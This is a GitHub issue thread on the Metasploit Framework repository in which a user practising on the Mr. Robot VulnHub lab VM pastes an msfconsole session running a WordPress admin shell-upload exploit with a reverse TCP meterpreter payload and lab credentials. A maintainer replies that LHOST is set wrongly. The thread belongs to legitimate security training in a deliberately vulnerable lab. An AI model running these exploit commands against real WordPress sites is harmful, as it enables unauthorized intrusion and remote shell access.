rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

I'm actually trying to enter the Mr. Robot VM on VulnHub, and when I try to use a WordPress exploit it tells me that the exploit completed but no session was created. What can I do? #18593

Closed Le8XtN closed 10 months ago

Le8XtN commented 10 months ago
┌──(kali㉿kali)-[~]
└─$ msfconsole   

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!

       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search wordpress shell

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
   0   exploit/multi/http/wp_ait_csv_rce                        2020-11-14       excellent  Yes    WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
   1   exploit/unix/webapp/wp_admin_shell_upload                2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   2   exploit/unix/webapp/wp_asset_manager_upload_exec         2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   3   exploit/multi/http/wp_crop_rce                           2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   4   exploit/unix/webapp/wp_mobile_detector_upload_execute    2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   5   exploit/unix/webapp/wp_symposium_shell_upload            2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   6   exploit/unix/webapp/wp_property_upload_exec              2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   7   exploit/multi/http/wp_dnd_mul_file_rce                   2020-05-11       excellent  Yes    Wordpress Drag and Drop Multi File Uploader RCE
   8   exploit/unix/webapp/wp_nmediawebsite_file_upload         2015-04-12       excellent  Yes    Wordpress N-Media Website Contact Form Upload Vulnerability
   9   exploit/multi/http/wp_plugin_backup_guard_rce            2021-05-04       excellent  Yes    Wordpress Plugin Backup Guard - Authenticated Remote Code Execution
   10  exploit/multi/http/wp_plugin_modern_events_calendar_rce  2021-01-29       excellent  Yes    Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution
   11  exploit/multi/http/wp_plugin_sp_project_document_rce     2021-06-14       excellent  Yes    Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution

Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/http/wp_plugin_sp_project_document_rce                                                                                                        

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME elliot
USERNAME => elliot
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.38.1.111
RHOSTS => 10.38.1.111
msf6 exploit(unix/webapp/wp_admin_shell_upload) > EXPLOIT
[-] Unknown command: EXPLOIT
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > 

adfoster-r7 commented 10 months ago

You need to correctly set your LHOST. It's probably set LHOST 10.38.1.1 - but you should confirm this with ipconfig/ifconfig.

Le8XtN commented 10 months ago

Thank you very much.

adfoster-r7 commented 10 months ago

I'll pre-emptively close this for now assuming that it worked :+1: